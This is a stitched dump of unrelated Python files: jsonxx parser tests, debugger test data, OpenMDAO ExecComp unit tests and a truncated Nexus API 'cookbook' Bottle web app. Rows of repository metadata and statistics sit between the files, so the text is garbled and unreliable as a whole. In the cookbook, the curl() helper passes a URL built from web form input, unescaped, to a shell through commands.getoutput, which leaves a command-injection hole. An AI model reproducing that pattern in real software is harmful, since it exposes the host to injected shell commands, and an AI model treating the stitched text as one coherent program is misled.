# -*- coding: utf-8 -*- # # Copyright (c) 2021~2999 - Cologler <skyoflw@gmail.com> # ---------- # # ---------- from jsonxx import loads def test_null(): assert loads('null') == None def test_false(): assert loads('false') == False def test_true(): assert loads('true') == True def test_int(): assert loads('123') == 123 def test_str(): assert loads('"123"') == "123" def test_array(): assert loads('["123", 123, false]') == ["123", 123, False] def test_object(): assert loads('{"123": 123}') == {"123": 123}
18.133333
62
0.564338
70
544
4.285714
0.385714
0.163333
0.186667
0.226667
0.16
0.16
0
0
0
0
0
0.10274
0.194853
544
29
63
18.758621
0.582192
0.180147
0
0
0
0
0.138952
0
0
0
0
0
0.466667
1
0.466667
true
0
0.066667
0
0.533333
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
1
1
0
0
0
1
0
0
6
215c18211d0ea463f59a3a00c355a288c23a8ff7
87
py
Python
Python/Tests/TestData/DebuggerProject/UnhandledException5.py
nanshuiyu/pytools
9f9271fe8cf564b4f94e9456d400f4306ea77c23
[ "Apache-2.0" ]
null
null
null
Python/Tests/TestData/DebuggerProject/UnhandledException5.py
nanshuiyu/pytools
9f9271fe8cf564b4f94e9456d400f4306ea77c23
[ "Apache-2.0" ]
null
null
null
Python/Tests/TestData/DebuggerProject/UnhandledException5.py
nanshuiyu/pytools
9f9271fe8cf564b4f94e9456d400f4306ea77c23
[ "Apache-2.0" ]
null
null
null
def A(): return ValueError try: raise ValueError() # breaks except A(): pass
14.5
33
0.632184
11
87
5
0.818182
0
0
0
0
0
0
0
0
0
0
0
0.252874
87
5
34
17.4
0.846154
0.068966
0
0
0
0
0
0
0
0
0
0
0
1
0.25
true
0.25
0
0.25
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
1
0
0
0
6
2166d0a2bf1e7a466d4dd60309db4af4e7a7d64c
44
py
Python
Face_rec/__init__.py
SOUHARDYAADHIKARY1999/Face_rev_pip
65bdb76612b960349bfd3038a02883aa09a7f99a
[ "MIT" ]
null
null
null
Face_rec/__init__.py
SOUHARDYAADHIKARY1999/Face_rev_pip
65bdb76612b960349bfd3038a02883aa09a7f99a
[ "MIT" ]
null
null
null
Face_rec/__init__.py
SOUHARDYAADHIKARY1999/Face_rev_pip
65bdb76612b960349bfd3038a02883aa09a7f99a
[ "MIT" ]
null
null
null
from Face_rec.FaceClass import FaceIndentity
44
44
0.909091
6
44
6.5
1
0
0
0
0
0
0
0
0
0
0
0
0.068182
44
1
44
44
0.95122
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
dcc9b73c34092a6b70af02c32dae9efec5b5d1a2
36
py
Python
tests/selenium_tests/jbrowse_selenium/__init__.py
rbuels/jbrowse
a4cfc3234f4708ee86b719f9f10a2b6c606c03ff
[ "Artistic-2.0" ]
319
2015-01-05T14:42:43.000Z
2022-03-30T12:55:07.000Z
tests/selenium_tests/jbrowse_selenium/__init__.py
rbuels/jbrowse
a4cfc3234f4708ee86b719f9f10a2b6c606c03ff
[ "Artistic-2.0" ]
1,065
2015-01-06T08:50:10.000Z
2022-03-25T21:01:48.000Z
tests/selenium_tests/jbrowse_selenium/__init__.py
Julboteroc/csmb
90991f64ed86a018a40910a83df00585e8e70ee5
[ "Artistic-2.0" ]
191
2015-01-20T03:41:12.000Z
2022-03-09T03:32:17.000Z
from JBrowseTest import JBrowseTest
18
35
0.888889
4
36
8
0.75
0
0
0
0
0
0
0
0
0
0
0
0.111111
36
1
36
36
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
dccb701273674683e54722dc115503efec6f6227
14
py
Python
pyth/plugins/xhtml/__init__.py
eriol/pyth
f2a06fc8dc9b1cfc439ea14252d39b9845a7fa4b
[ "MIT" ]
47
2015-01-26T22:06:53.000Z
2022-01-04T15:11:14.000Z
pyth/plugins/xhtml/__init__.py
eriol/pyth
f2a06fc8dc9b1cfc439ea14252d39b9845a7fa4b
[ "MIT" ]
16
2015-02-20T18:12:22.000Z
2021-12-17T09:49:19.000Z
pyth/plugins/xhtml/__init__.py
eriol/pyth
f2a06fc8dc9b1cfc439ea14252d39b9845a7fa4b
[ "MIT" ]
45
2015-01-29T02:47:39.000Z
2022-01-26T12:50:27.000Z
""" XHTML """
3.5
5
0.357143
1
14
5
1
0
0
0
0
0
0
0
0
0
0
0
0.214286
14
3
6
4.666667
0.454545
0.357143
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
0d0490c1dd27fbb9dc31b3e3c4f160a8d649b483
35
py
Python
src/__init__.py
Vasco-jofra/format-string-finder-binja
a02d1501ca1db1c4ea0ced65c01af0d5ad1c8712
[ "MIT" ]
19
2019-07-15T21:17:07.000Z
2021-04-25T12:52:11.000Z
src/__init__.py
Vasco-jofra/format-string-finder-binja
a02d1501ca1db1c4ea0ced65c01af0d5ad1c8712
[ "MIT" ]
null
null
null
src/__init__.py
Vasco-jofra/format-string-finder-binja
a02d1501ca1db1c4ea0ced65c01af0d5ad1c8712
[ "MIT" ]
1
2020-12-29T20:56:34.000Z
2020-12-29T20:56:34.000Z
from .format_string_finder import *
35
35
0.857143
5
35
5.6
1
0
0
0
0
0
0
0
0
0
0
0
0.085714
35
1
35
35
0.875
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0d4ea72b0ecfdbd782e0e8275750f111f3c836c5
87
py
Python
words_memo/domain/dictionary.py
senpay/words_memo
7fb6463f32481e4d4dc3700c6af18ef073a1cd9a
[ "Unlicense" ]
null
null
null
words_memo/domain/dictionary.py
senpay/words_memo
7fb6463f32481e4d4dc3700c6af18ef073a1cd9a
[ "Unlicense" ]
null
null
null
words_memo/domain/dictionary.py
senpay/words_memo
7fb6463f32481e4d4dc3700c6af18ef073a1cd9a
[ "Unlicense" ]
null
null
null
class Dictionary: def get_sub_dictionary(self): return Dictionary pass
17.4
33
0.689655
10
87
5.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.264368
87
4
34
21.75
0.90625
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0.25
0
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
1
1
0
0
6
b4f83a89b5bdfc79d43aec7f8dd11856fce58d65
167
py
Python
07RDDExamples/pythoncodes/lambdademo.py
sharonwoo/BEADSEP20
77f9031d1373320a7aecbe9cfe9c8e90e604c34e
[ "MIT" ]
2
2022-01-16T04:30:00.000Z
2022-01-23T08:04:47.000Z
07RDDExamples/pythoncodes/lambdademo.py
sharonwoo/BEADSEP20
77f9031d1373320a7aecbe9cfe9c8e90e604c34e
[ "MIT" ]
null
null
null
07RDDExamples/pythoncodes/lambdademo.py
sharonwoo/BEADSEP20
77f9031d1373320a7aecbe9cfe9c8e90e604c34e
[ "MIT" ]
5
2020-09-01T01:11:43.000Z
2022-01-21T10:32:32.000Z
mult_3_5 = lambda x: x%3==0 or x%5==0 print(mult_3_5(3)) print(mult_3_5(4)) print(mult_3_5(5)) def add1(): return lambda x: x + 1 f = add1() print(f(2))
16.7
38
0.592814
39
167
2.333333
0.384615
0.21978
0.263736
0.362637
0
0
0
0
0
0
0
0.145038
0.215569
167
9
39
18.555556
0.549618
0
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0
0.125
0.25
0.5
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
1
0
6
2ea0c21b1e8dbf9eafbda61beb50c5c176ed442f
80
py
Python
services/security.py
stuartcampbell/nsls2-api
8175e524279f51d9b43ad0f8f08b8b3f54eceae0
[ "BSD-3-Clause" ]
null
null
null
services/security.py
stuartcampbell/nsls2-api
8175e524279f51d9b43ad0f8f08b8b3f54eceae0
[ "BSD-3-Clause" ]
null
null
null
services/security.py
stuartcampbell/nsls2-api
8175e524279f51d9b43ad0f8f08b8b3f54eceae0
[ "BSD-3-Clause" ]
null
null
null
from fastapi import Security from fastapi.security.api_key import APIKeyHeader
20
49
0.8625
11
80
6.181818
0.636364
0.323529
0
0
0
0
0
0
0
0
0
0
0.1125
80
3
50
26.666667
0.957746
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2ea6ef9e64d8e0592d8256aee3f6f66b86ce6fe1
29
py
Python
demo.py
mainsail-org/RustPython
5d2d87c24f1ff7201fcc8d4fcffadb0ec12dc127
[ "CC-BY-4.0", "MIT" ]
11,058
2018-05-29T07:40:06.000Z
2022-03-31T11:38:42.000Z
demo.py
mainsail-org/RustPython
5d2d87c24f1ff7201fcc8d4fcffadb0ec12dc127
[ "CC-BY-4.0", "MIT" ]
2,105
2018-06-01T10:07:16.000Z
2022-03-31T14:56:42.000Z
demo.py
mainsail-org/RustPython
5d2d87c24f1ff7201fcc8d4fcffadb0ec12dc127
[ "CC-BY-4.0", "MIT" ]
914
2018-07-27T09:36:14.000Z
2022-03-31T19:56:34.000Z
print("Hello, RustPython!")
9.666667
27
0.689655
3
29
6.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.103448
29
2
28
14.5
0.769231
0
0
0
0
0
0.642857
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
2c176d2b0a2c61369a1dc4302550a8e839bae2ba
11,494
py
Python
openmdao/components/tests/test_exec_comp.py
ryanfarr01/blue
a9aac98c09cce0f7cadf26cf592e3d978bf4e3ff
[ "Apache-2.0" ]
null
null
null
openmdao/components/tests/test_exec_comp.py
ryanfarr01/blue
a9aac98c09cce0f7cadf26cf592e3d978bf4e3ff
[ "Apache-2.0" ]
null
null
null
openmdao/components/tests/test_exec_comp.py
ryanfarr01/blue
a9aac98c09cce0f7cadf26cf592e3d978bf4e3ff
[ "Apache-2.0" ]
null
null
null
import unittest import math import numpy as np from openmdao.api import IndepVarComp, Group, Problem, ExecComp from openmdao.devtools.testutil import assert_rel_error class TestExecComp(unittest.TestCase): def test_colon_vars(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=foo:bar+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: failed to compile expression 'y=foo:bar+1.'.") def test_bad_kwargs(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=x+1.', xx=2.0)) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: arg 'xx' in call to ExecComp() does not refer to any variable in the expressions ['y=x+1.']") def test_bad_kwargs_meta(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=x+1.', x={'val': 2.0, 'low': 0.0, 'high': 10.0, 'units': 'ft'})) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: the following metadata names were not recognized for variable 'x': ['high', 'low', 'val']") def test_name_collision_const(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('e=x+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: cannot assign to variable 'e' because it's already defined as an internal function or constant.") def test_name_collision_func(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('sin=x+1.')) with self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: cannot assign to variable 'sin' because it's already defined as an internal function or constant.") def test_func_as_rhs_var(self): prob = Problem(model=Group()) prob.model.add_subsystem('C1', ExecComp('y=sin+1.')) with 
self.assertRaises(Exception) as context: prob.setup(check=False) self.assertEqual(str(context.exception), "C1: cannot use 'sin' as a variable because it's already defined as an internal function.") def test_mixed_type(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=numpy.sum(x)', x=np.arange(10,dtype=float))) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 45.0, 0.00001) def test_simple(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=x+1.', x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 3.0, 0.00001) def test_for_spaces(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y = pi * x', x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) self.assertTrue('pi' not in C1._inputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 2 * math.pi, 0.00001) def test_units(self): prob = Problem(model=Group()) prob.model.add_subsystem('indep', IndepVarComp('x', 100.0, units='cm')) C1 = prob.model.add_subsystem('C1', ExecComp('y=x+z+1.', x={'value': 2.0, 'units': 'm'}, y={'units': 'm'}, z=2.0)) prob.model.connect('indep.x', 'C1.x') prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 4.0, 0.00001) def test_math(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=sin(x)', x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], math.sin(2.0), 0.00001) def test_array(self): prob = 
Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=x[1]', x=np.array([1.,2.,3.]), y=0.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 2.0, 0.00001) def test_array_lhs(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp(['y[0]=x[1]', 'y[1]=x[0]'], x=np.array([1.,2.,3.]), y=np.array([0.,0.]))) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], np.array([2.,1.]), 0.00001) def test_simple_array_model(self): prob = Problem() prob.model = Group() prob.model.add_subsystem('p1', IndepVarComp('x', np.ones([2]))) prob.model.add_subsystem('comp', ExecComp(['y[0]=2.0*x[0]+7.0*x[1]', 'y[1]=5.0*x[0]-3.0*x[1]'], x=np.zeros([2]), y=np.zeros([2]))) prob.model.connect('p1.x', 'comp.x') prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() data = prob.check_partials(out_stream=None) assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5) def test_simple_array_model2(self): prob = Problem() prob.model = Group() prob.model.add_subsystem('p1', IndepVarComp('x', np.ones([2]))) prob.model.add_subsystem('comp', ExecComp('y = mat.dot(x)', x=np.zeros((2,)), y=np.zeros((2,)), mat=np.array([[2.,7.],[5.,-3.]]))) prob.model.connect('p1.x', 'comp.x') prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() data = prob.check_partials(out_stream=None) 
assert_rel_error(self, data['comp'][('y','x')]['abs error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['abs error'][2], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][0], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][1], 0.0, 1e-5) assert_rel_error(self, data['comp'][('y','x')]['rel error'][2], 0.0, 1e-5) def test_complex_step(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp(['y=2.0*x+1.'], x=2.0)) prob.setup(check=False) self.assertTrue('x' in C1._inputs) self.assertTrue('y' in C1._outputs) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 5.0, 0.00001) C1._linearize() assert_rel_error(self, C1.jacobian[('y','x')], [[-2.0]], 0.00001) def test_complex_step2(self): prob = Problem(Group()) prob.model.add_subsystem('p1', IndepVarComp('x', 2.0)) prob.model.add_subsystem('comp', ExecComp('y=x*x + x*2.0')) prob.model.connect('p1.x', 'comp.x') prob.set_solver_print(level=0) prob.setup(check=False, mode='fwd') prob.run_model() J = prob.compute_total_derivs(['comp.y'], ['p1.x'], return_format='flat_dict') assert_rel_error(self, J['comp.y', 'p1.x'], np.array([[6.0]]), 0.00001) prob.setup(check=False, mode='rev') prob.run_model() J = prob.compute_total_derivs(['comp.y'], ['p1.x'], return_format='flat_dict') assert_rel_error(self, J['comp.y', 'p1.x'], np.array([[6.0]]), 0.00001) def test_abs_complex_step(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=2.0*abs(x)', x=-2.0)) prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], 4.0, 0.00001) # any negative C1.x should give a 2.0 derivative for dy/dx C1._inputs['x'] = -1.0e-10 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], [[2.0]], 0.00001) C1._inputs['x'] = 3.0 C1._linearize() assert_rel_error(self, 
C1.jacobian['y','x'], [[-2.0]], 0.00001) C1._inputs['x'] = 0.0 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], [[-2.0]], 0.00001) def test_abs_array_complex_step(self): prob = Problem(model=Group()) C1 = prob.model.add_subsystem('C1', ExecComp('y=2.0*abs(x)', x=np.ones(3)*-2.0, y=np.zeros(3))) prob.setup(check=False) prob.set_solver_print(level=0) prob.run_model() assert_rel_error(self, C1._outputs['y'], np.ones(3)*4.0, 0.00001) # any negative C1.x should give a 2.0 derivative for dy/dx C1._inputs['x'] = np.ones(3)*-1.0e-10 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], np.eye(3)*2.0, 0.00001) C1._inputs['x'] = np.ones(3)*3.0 C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], np.eye(3)*-2.0, 0.00001) C1._inputs['x'] = np.zeros(3) C1._linearize() assert_rel_error(self, C1.jacobian['y','x'], np.eye(3)*-2.0, 0.00001) C1._inputs['x'] = np.array([1.5, -0.6, 2.4]) C1._linearize() expect = np.zeros((3,3)) expect[0,0] = -2.0 expect[1,1] = 2.0 expect[2,2] = -2.0 assert_rel_error(self, C1.jacobian['y','x'], expect, 0.00001) if __name__ == "__main__": unittest.main()
37.439739
129
0.551853
1,633
11,494
3.74158
0.10594
0.051064
0.075614
0.094272
0.851064
0.823241
0.819149
0.799509
0.776105
0.755646
0
0.055463
0.272142
11,494
306
130
37.562092
0.674874
0.009831
0
0.58296
0
0.022422
0.103885
0.003867
0
0
0
0
0.269058
1
0.085202
false
0
0.022422
0
0.112108
0.058296
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2596e05d2a9716d2c3d88428dd880f441aa74095
85,981
py
Python
apps/cookbook/cookbook.py
bibbityjibbity/LLL-TAO
4073ba412f71bf27d21fd297497a7c276ebd2d67
[ "MIT" ]
null
null
null
apps/cookbook/cookbook.py
bibbityjibbity/LLL-TAO
4073ba412f71bf27d21fd297497a7c276ebd2d67
[ "MIT" ]
null
null
null
apps/cookbook/cookbook.py
bibbityjibbity/LLL-TAO
4073ba412f71bf27d21fd297497a7c276ebd2d67
[ "MIT" ]
null
null
null
#!/usr/bin/env python # # cookbook.py - Nexus API Lesson Cook Book # # This program teaches you how to use the Nexus APIs. It is an interactive # walk through of each API that is supported by Nexus Tritium and what # parameters you need to for a restful call. # # The user interface will also use the python SDK but allows the user to # curl directly to any Nexus node on the network. # # Usage: python cookbook.py [<port>] # # This program has depends on the nexus_sdk.py SDK library where the master # copy is in LLL-TAO/sdk/nexus_sdk.py. A shadow copy is in a peer # directory in TAO-App/sdk/nexus_sdk.py and this application directory # symlinks to the sdk library (via "import nexus_sdk as nexus").. # #------------------------------------------------------------------------------ import commands import bottle import sys import json import socket import os try: sdk_dir = os.getcwd().split("/")[0:-2] sdk_dir = "/".join(sdk_dir) + "/sdk" sys.path.append(sdk_dir) import nexus_sdk as nexus except: print "Need to place nexus_sdk.py in this directory" exit(0) #endtry # # Did command line have a port number to listen to? # cookbook_port = int(sys.argv[1]) if (len(sys.argv) == 2) else 1111 # # Nexus node to query for API. A change to the SDK URL needs a call to # nexus_sdk.change_sdk_url(). # nexus_api_node = "http://localhost:8080" nexus_sdk_node = "http://localhost:8080" # # Keep track of last username logged in. 
# nexus_api_last_username = None nexus_sdk_last_username = None #------------------------------------------------------------------------------ def green(string): output = '<font color="green">{}</font>'.format(string) return(output) #enddef def red(string): output = '<font color="red">{}</font>'.format(string) return(output) #enddef def blue(string): output = '<font color="blue">{}</font>'.format(string) return(output) #enddef def bold(string): string = string.replace("[1m", "<b>") string = string.replace("[0m", "</b>") return(string) #enddef # # hl - highlight string # # Take the string "{}<method>/<verb>/<noun>?" or "{}<method>/<verb>/<noun>{}" # and replacae the occurence of "<verb/<noun>" in blue. # def hl(string): left = string.find("/") right = string.find("?") if (right == -1): right = string.find("{", 2) s = string[left+1:right] s = string.replace(s, blue(s)) return(s) #enddef # # curl # # Call curl and return json. # def curl(api_command): global nexus_api_node url = "{}/{}".format(nexus_api_node, api_command) output = commands.getoutput('curl --silent "{}"'.format(url)) if (output == "" or output == None): return({"error" : "curl failed, nexus daemon may not be running"}) #endif return(json.loads(output)) #enddef # # sid_to_sdd # # To keep session continuity across web pages. # contexts = {} def sid_to_sdk(sid): global contexts if (contexts.has_key(sid)): return(contexts[sid], "") output = ('"error": Login session {} does not exist - ' + \ 'login using users/login/user and click the SDK button').format(sid) return(None, show(output)) #enddef # # format_transactions # # Put a line per array element so the eyes can parse each transaction record # just a tad better. Used for most */list/* methods. 
# def format_transactions(data): if (data.has_key("result") == False): return(json.dumps(data)) if (data["result"] == None): return('{"error": "no json returned"}') output = json.dumps(data) return(output) #enddef # # no_parms # # Checks that any supplied arg in the variable list of arguments is "" or None. # def no_parms(*args): for a in args: if (a == "" or a == None): return(True) #endfor return(False) #enddef #------------------------------------------------------------------------------ show_html = ''' <br><table align="left" style="word-break:break-all;"> <tr><td>{}</td></tr> </table><br>&nbsp;<br><hr size="5"> ''' # # show # # This is JSON output returned from Nexus API. # def show(msg, sid="", genid=""): msg = red(msg) if (msg.find('"error":') != -1) else green(msg) output = show_html.format(bold(msg)) + build_body_page(sid, genid) hostname = blue(socket.gethostname()) sdk = blue(nexus_sdk_last_username) api = blue(nexus_api_last_username) return(landing_page.format(hostname, sdk, api, output)) #enddef # # Wrapper to make all web pages look alike, from a format perspective. # landing_page = ''' <html> <title>Nexus Interactive SDK/API Cook Book</title> <body bgcolor="gray"> <div style="margin:20px;background-color:#F5F5F5;padding:15px; border-radius:20px;border:5px solid #666666;"> <font face="verdana"><center> <br><head><a href="/" style="text-decoration:none;"><font color="black"> <b>Nexus Interactive SDK/API Cook Book</b></a></head><br> <font size="2""><br>Running on {}, last logged in SDK/API user {}/{}</font> <br><br><hr size="5"> {} <hr size="5"></center></font></body></html> ''' # # Used as a generic template for all API calls. Used for form input from # the web interface. 
# form_header = '<form action="/{}" method="post">' form_parm = '<input type="text" name="{}" value="{}" size="15" />' form_footer = ''' &nbsp;&nbsp;&nbsp;&nbsp; <input type="submit" value="SDK" name="action" /> &nbsp; <input type="submit" value="API" name="action" /> </form> ''' #------------------------------------------------------------------------------ # # build_url_html # # Put in two form lines for user to change SDK or API URL. # def build_url_html(o): global nexus_api_node, nexus_sdk_node o += "<br><b>Nexus Node URLs</b><br><br><table>" o += ''' <form action="/url/sdk" method="post"> SDK:&nbsp; <input type="text" name="url" value="{}" size="30" /> &nbsp; <input type="submit" value="Change URL" name="action" /> </form> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <form action="/url/api" method="post"> API:&nbsp; <input type="text" name="url" value="{}" size="30" /> &nbsp; <input type="submit" value="Change URL" name="action" /> </form> <br><br><hr size="5"> '''.format(nexus_sdk_node, nexus_api_node) return(o) #enddef # # build_system_html # system_get_info = '{}system/get/info{}' system_list_peers = '{}system/list/peers{}' system_list_lisp_eids = '{}system/list/lisp-eids{}' def build_system_html(sid, genid, o): f = form_footer o += "<br><b>System API</b><br><br><table>" o += "<tr><td>" h = form_header.format("system-get-info") o += hl(system_get_info).format(h, "<br><br>" + f) o += "</td>" o += "<td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>" o += "<td>" h = form_header.format("system-list-peers") o += hl(system_list_peers).format(h, "<br><br>" + f) o += "</td>" o += "<td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>" o += "<td>" h = form_header.format("system-list-lisp-eids") o += hl(system_list_lisp_eids).format(h, "<br><br>" + f) o += "</td></tr>" o += '</table><br><hr size="5">' return(o) #enddef @bottle.route('/system-get-info', method="post") def do_system_get_info(): action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) 
if (sdk_or_api): sdk = nexus.sdk_init("system", "get/info", "") if (sdk == None): return(show(red("Could not initialize SDK"))) output = sdk.nexus_system_get_info() del(sdk) else: output = curl(system_get_info.format("", "")) #endif output = json.dumps(output) return(show(output)) #enddef @bottle.route('/system-list-peers', method="post") def do_system_list_peers(): action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init("system", "list/peers", "") if (sdk == None): return(show(red("Could not initialize SDK"))) output = sdk.nexus_system_list_peers() del(sdk) else: output = curl(system_list_peers.format("", "")) #endif output = json.dumps(output) return(show(output)) #enddef @bottle.route('/system-list-lisp-eids', method="post") def do_system_list_lisp_eids(): action = bottle.request.forms.get("action") sdk_or_api = (action.find("SDK") != -1) if (sdk_or_api): sdk = nexus.sdk_init("system", "lisp/lisp-eids", "") if (sdk == None): return(show(red("Could not initialize SDK"))) output = sdk.nexus_system_list_lisp_eids() del(sdk) else: output = curl(system_list_lisp_eids.format("", "")) #endif output = json.dumps(output) return(show(output)) #enddef #------------------------------------------------------------------------------ # # build_users_html # users_create_user = '{}users/create/user?username={}&password={}&pin={}{}' users_login_user = '{}users/login/user?username={}&password={}&pin={}{}' users_logout_user = '{}users/logout/user?session={}{}' users_lock_user = '{}users/lock/user?session={}{}' users_unlock_user = '{}users/unlock/user?session={}&pin={}{}' users_list_transactions = \ '{}users/list/transactions?genesis={}&page={}&limit={}&verbose={}{}' users_list_notifications = \ '{}users/list/notifications?genesis={}&page={}&limit={}{}' users_list_items = '{}users/list/items?genesis={}&page={}&limit={}{}' users_list_assets = '{}users/list/assets?genesis={}&page={}&limit={}{}' users_list_tokens = 
'{}users/list/tokens?genesis={}&page={}&limit={}{}' users_list_accounts = '{}users/list/accounts?genesis={}&page={}&limit={}{}' def build_users_html(sid, genid, o): f = form_footer o += "<br><b>Users API</b><br><br><table>" o += "<tr><td>" h = form_header.format("users-login-user") username = form_parm.format("username", "") password = form_parm.format("password", "") pin = form_parm.format("pin", "") o += hl(users_login_user).format(h, username, password, pin, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-logout-user") session = form_parm.format("session", sid) o += hl(users_logout_user).format(h, session, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-create-user") username = form_parm.format("username", "") password = form_parm.format("password", "") pin = form_parm.format("pin", "") o += hl(users_create_user).format(h, username, password, pin, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-lock-user") session = form_parm.format("session", sid) o += hl(users_lock_user).format(h, session, f) o += "</td></tr>" o += "<tr><td>" h = form_header.format("users-unlock-user") session = form_parm.format("session", sid) pin = form_parm.format("pin", "") o += hl(users_unlock_user).format(h, session, pin, f) o += "</td></tr>" o += "<tr><td>" h = "users-list-transactions" if (sid != ""): h += "/{}".format(sid) h = form_header.format(h) genesis = form_parm.format("genesis", genid) page = form_parm.format("page", "0") limit = form_parm.format("limit", "100") verbose = form_parm.format("verbose", "default") o += hl(users_list_transactions).format(h, genesis, page, limit, verbose, f) o += "</td></tr>" o += "<tr><td>" h = 